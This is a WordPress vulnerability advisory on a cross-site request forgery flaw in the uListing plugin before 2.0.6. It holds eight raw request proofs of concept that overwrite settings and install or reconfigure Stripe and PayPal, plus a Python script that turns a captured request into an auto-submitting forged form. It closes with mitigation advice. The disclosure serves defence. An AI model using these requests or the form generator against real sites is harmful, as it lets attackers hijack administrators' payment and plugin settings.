WPVDB-ID: 91448867-FB75-4D76-815D-86AAD5A64225 (wpvulndb, reported by m0ze)
History: Jul 27, 2021 - 12:00 a.m.

uListing < 2.0.6 - Settings Update via CSRF

2021-07-27 00:00:00
m0ze
wpscan.com
11
Tags: csrf, settings update, wpnonce, security tokens, plugin

EPSS: 0.001 (percentile 21.6%)

The plugin's admin-ajax.php handlers that save its settings (stm_settings_save, stm_payment_method, stm_save_payment and stm_update_email_data in the requests below) act on any POST from a logged-in administrator without verifying a WordPress nonce [ https://codex.wordpress.org/WordPress_Nonces ]. Because the requests are plain application/x-www-form-urlencoded posts, an attacker-controlled page can make an administrator's browser submit them cross-site, changing the plugin's main settings, installing, reconfiguring or removing the Stripe and PayPal payment methods, and overwriting the e-mail template settings. Fixed in 2.0.6. Note that the captured requests below show the administrator's own session (`Cookie: [admin cookies]`); in a real attack that cookie is attached by the victim's browser, not supplied by the attacker.

PoC

PoC #1 | CSRF | Main Settings Update:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 6784

action=stm_settings_save&data%5Bcron%5D%5Bmode%5D=alternate&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Benable%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bverify%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Btitle%5D=Google&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bclient_id%5D%5Btitle%5D=Google+Client+ID&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bclient_id%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bclient_secret%5D%5Btitle%5D=Google+Client+Secret&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bclient_secret%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5BclassList%5D%5Bwrap%5D=google-icon-wrapper&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5BclassList%5D%5Bicon%5D=icon-search+path1&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bsocial_links%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com%2Fwp-login.php%3Fsocial_method%3Dgoogle&data%5BsocialLogin%5D%5Bnetworks%5D%5Bgoogle%5D%5Bdescription%5D=Here+you+can+get+more+information+about+how+to+create+OAuth+APP+for±+%3Ca+target%3D%22_blank%22+href%3D%22https%3A%2F%2Fdevelopers.google.com%2Fidentity%2Fsign-in%2Fweb%2Fsign-in%22%3EGoogle+Documentation%3C%2Fa%3E.+Don%60t+forget+about+setting+up+Authentication+Redirect+URL+like±&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Benable%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bverify%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Btitle%5D=Facebook&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bclient_id%5D%5Btitle%5D=Facebook+App+ID&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bclient_id%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bclient_secret%5D%5Btitle%5D=Facebook+App+Secret&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bclient_secret%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5BclassList%5D%5Bwrap%5D=facebook-icon-wrapper&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5BclassList%5D%5Bicon%5D=fab+fa-facebook-f&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bsocial_links%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com%2F%3Fsocial_method%3DFacebook&data%5BsocialLogin%5D%5Bnetworks%5D%5Bfacebook%5D%5Bdescription%5D=Here+you+can+get+more+information+about+how+to+create+OAuth+APP+for±+%3Ca+href%3D%22https%3A%2F%2Fdevelopers.facebook.com%2Fdocs%2Ffacebook-login%2F%22%3EFacebook+Documentation%3C%2Fa%3E.+Don%60t+forget+about+setting+up+Authentication+Redirect+URL+like±&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Benable%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bverify%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Btitle%5D=Twitter&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bclient_id%5D%5Btitle%5D=Twitter+API+Key&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bclient_id%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bclient_secret%5D%5Btitle%5D=Twitter+API+Secret&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bclient_secret%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5BclassList%5D%5Bwrap%5D=twitter-icon-wrapper&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5BclassList%5D%5Bicon%5D=fab+fa-twitter&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bsocial_links%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com&data%5BsocialLogin%5D%5Bnetworks%5D%5Btwitter%5D%5Bdescription%5D=Here+you+can+get+more+information+about+how+to+create+OAuth+APP+for±+%3Ca+href%3D%22https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Flog-in-with-twitter%2Flogin-in-with-twitter%22%3ETwitter+Documentation%3C%2Fa%3E.+Don%60t+forget+about+setting+up+Authentication+Redirect+URL+like±&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Benable%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bverify%5D=false&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Btitle%5D=Vkontakte&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bclient_id%5D%5Btitle%5D=Vkontakte+API+ID&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bclient_id%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bclient_secret%5D%5Btitle%5D=Vkontakte+Secret+Key&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bclient_secret%5D%5Bvalue%5D=&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5BclassList%5D%5Bwrap%5D=facebook-icon-wrapper&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5BclassList%5D%5Bicon%5D=fab+fa-vk&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bsocial_links%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com&data%5BsocialLogin%5D%5Bnetworks%5D%5Bvkontakte%5D%5Bdescription%5D=Here+you+can+get+more+information+about+how+to+create+OAuth+APP+for±+%3Ca+href%3D%22https%3A%2F%2Fvk.com%2Fdev%22%3EVkontakte+Documentation%3C%2Fa%3E.+Don%60t+forget+about+setting+up+Authentication+Redirect+URL+like±&data%5BsocialLogin%5D%5Bpreferences%5D%5Btab%5D=yes&data%5BsocialLogin%5D%5Bpreferences%5D%5Bicons%5D=square&data%5BsocialLogin%5D%5Bpreferences%5D%5Bredirect_url%5D=https%3A%2F%2Fexample.com&data%5BsocialLogin%5D%5Bpreferences%5D%5Btitle%5D=Login+with+social+ID&data%5Bpages%5D%5Baccount_page%5D%5Baccount%5D=9&data%5Bpages%5D%5Baccount_endpoint%5D%5Bedit-profile%5D=edit-profile&data%5Bpages%5D%5Baccount_endpoint%5D%5Bmy-plans%5D=my-plans&data%5Bpages%5D%5Baccount_endpoint%5D%5Bpayment-history%5D=payment-history&data%5Bpages%5D%5Baccount_endpoint%5D%5Bmy-listing%5D=my-listing&data%5Bpages%5D%5Baccount_endpoint%5D%5Bsaved-searches%5D=saved-searches&data%5Bpages%5D%5Baccount_endpoint%5D%5Bmy-card%5D=my-card&data%5Bpages%5D%5Baccount_endpoint%5D%5Bedit-account%5D=&data%5Bpages%5D%5Badd_listing%5D%5Blisting%5D=12&data%5Bpages%5D%5Bpricing_plan%5D%5Bpricing%5D=13&data%5Bpages%5D%5Blisting_type_page%5D%5B15%5D=16&data%5Bpages%5D%5Blisting_type_page%5D%5B17%5D=18&data%5Bpages%5D%5Blisting_type_page%5D%5B55%5D=2&data%5Bpages%5D%5Blisting_type_page%5D%5B62%5D=0&data%5Bpages%5D%5Bwishlist%5D%5Bwishlist_page%5D=&data%5Bpages%5D%5Bcompare%5D%5Bcompare_page%5D=&data%5Bmain%5D%5Bcurrency%5D%5Bcurrency%5D=USD&data%5Bmain%5D%5Bcurrency%5D%5Bposition%5D=left_space&data%5Bmain%5D%5Bcurrency%5D%5Bcharacters_after%5D=2&data%5Bmain%5D%5Bcurrency%5D%5Bdecimal_separator%5D=.&data%5Bmain%5D%5Bcurrency%5D%5Bthousands_separator%5D=%2C&data%5Bmain%5D%5Bmap%5D%5Bapi_key%5D=&data%5Bmain%5D%5Bmap%5D%5Bmap_type%5D=google&data%5Bmain%5D%5Bmap%5D%5Bhover_option%5D=no&data%5Bmain%5D%5Bpricing_plans%5D%5Bback_slots%5D=true&data%5Bmain%5D%5Bpricing_plans%5D%5Bdelete_listings%5D=true&data%5Bmain%5D%5Bshort_codes%5D%5Bcategories%5D=8&data%5Bmain%5D%5Bshort_codes%5D%5Bfeatured_listings%5D=8&data%5Bmain%5D%5Bextra%5D%5Bremove_db%5D=true&data%5Bmain%5D%5Bdefault_placeholder%5D=

PoC #2 | CSRF | Stripe Payment Install:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60

action=stm_payment_method&type=install&payment_method=stripe

PoC #3 | CSRF | Stripe Payment Settings Update:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 260

action=stm_save_payment&id=stripe&data%5Bpublishable_key%5D=PoC&data%5Bsecret_key%5D=1553&data%5Bwhsec%5D=1553

PoC #4 | CSRF | PayPal Payment Install:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 69

action=stm_payment_method&type=install&payment_method=paypal_standard

PoC #5 | CSRF | PayPal Payment Settings Update:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 94

action=stm_save_payment&id=paypal_standard&data%5Bemail%5D=poc%40email.tld&data%5Bmode%5D=live

PoC #6 | CSRF | PayPal Payment Uninstall:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 71

action=stm_payment_method&type=uninstall&payment_method=paypal_standard

PoC #7 | CSRF | Stripe Payment Uninstall:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 62

action=stm_payment_method&type=uninstall&payment_method=stripe

PoC #8 | CSRF | Email Settings Update:

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 439

action=stm_update_email_data&data%5Bbanner%5D=&data%5Blogo%5D=&data%5Bsocials%5D%5Binstagram%5D%5Blabel%5D=Instagram&data%5Bsocials%5D%5Binstagram%5D%5Blink%5D=&data%5Bsocials%5D%5Bfacebook%5D%5Blabel%5D=Facebook&data%5Bsocials%5D%5Bfacebook%5D%5Blink%5D=&data%5Bsocials%5D%5Byoutube%5D%5Blabel%5D=Youtube&data%5Bsocials%5D%5Byoutube%5D%5Blink%5D=&data%5Bsocials%5D%5Btwitter%5D%5Blabel%5D=Twitter&data%5Bsocials%5D%5Btwitter%5D%5Blink%5D=
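The captured requests above are what the administrator's own browser sends; to turn one of them into an actual cross-site attack you need a page on another origin that makes the victim's browser submit the same fields. The script below is an added example written for this page, not code from the advisory or from the uListing plugin. It parses a raw admin-ajax.php request (a trimmed, constructed copy of PoC #3), checks that the body carries no nonce field (the names it looks for, `_wpnonce`, `security`, `nonce` and `_ajax_nonce`, are the ones WordPress code commonly uses and are an assumption here), and emits an auto-submitting HTML form for it. Two points it makes concrete: an HTML form cannot set the `X-Requested-With: XMLHttpRequest` header seen in the captures, so a handler that accepted the forged form must not have relied on that header either; and once a nonce is required, the same replay fails because the attacker cannot read the victim's nonce.

```python
import html
from urllib.parse import parse_qsl

# Constructed sample: a trimmed copy of PoC #3 (Stripe settings update)
# from the advisory, kept as a raw HTTP request string.
RAW_REQUEST = """POST /wp-admin/admin-ajax.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 260

action=stm_save_payment&id=stripe&data%5Bpublishable_key%5D=PoC&data%5Bsecret_key%5D=1553&data%5Bwhsec%5D=1553"""

# Assumed field names under which WordPress code usually passes a nonce
# to admin-ajax.php. If none is present, the body can be replayed verbatim
# from a foreign origin.
NONCE_FIELDS = ("_wpnonce", "security", "nonce", "_ajax_nonce")


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body fields).

    Headers are lower-cased; body fields are decoded (name, value) pairs,
    so data%5Bsecret_key%5D becomes data[secret_key].
    """
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    fields = parse_qsl(body, keep_blank_values=True)
    return method, path, headers, fields


def has_nonce(fields):
    """True if any body field is one of the assumed nonce parameter names."""
    return any(name in NONCE_FIELDS for name, _ in fields)


def csrf_form(raw, scheme="https"):
    """Return an auto-submitting HTML page that replays `raw` cross-site.

    Raises ValueError when the body already carries a nonce: a forged form
    cannot know the victim's nonce, so the replay would be rejected.
    """
    method, path, headers, fields = parse_request(raw)
    if has_nonce(fields):
        raise ValueError("request carries a nonce field; plain CSRF replay would fail")
    action = f"{scheme}://{headers['host']}{path}"
    inputs = "\n".join(
        f'  <input type="hidden" name="{html.escape(n)}" value="{html.escape(v)}">'
        for n, v in fields
    )
    # Only the body fields survive: the victim's browser attaches the session
    # cookie itself, and headers such as X-Requested-With cannot be set by a
    # plain HTML form, so they are deliberately dropped.
    return (
        "<!doctype html>\n<html><body>\n"
        f'<form id="f" method="{method}" action="{html.escape(action)}">\n'
        f"{inputs}\n</form>\n"
        "<script>document.getElementById('f').submit();</script>\n"
        "</body></html>"
    )


if __name__ == "__main__":
    print(csrf_form(RAW_REQUEST))
```

Whether the victim's browser actually attaches the WordPress session cookie to that cross-site POST depends on its SameSite handling (Chromium treats cookies set without a SameSite attribute as Lax and withholds them from cross-site POSTs, apart from a short grace period after the cookie is set), so confirm in the target browser rather than assuming. On the handler side, the standard fix is to call check_ajax_referer() with the action and field name the page's script was given via wp_create_nonce(), and to pair it with a current_user_can() capability check, since a nonce proves intent but not authorization.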

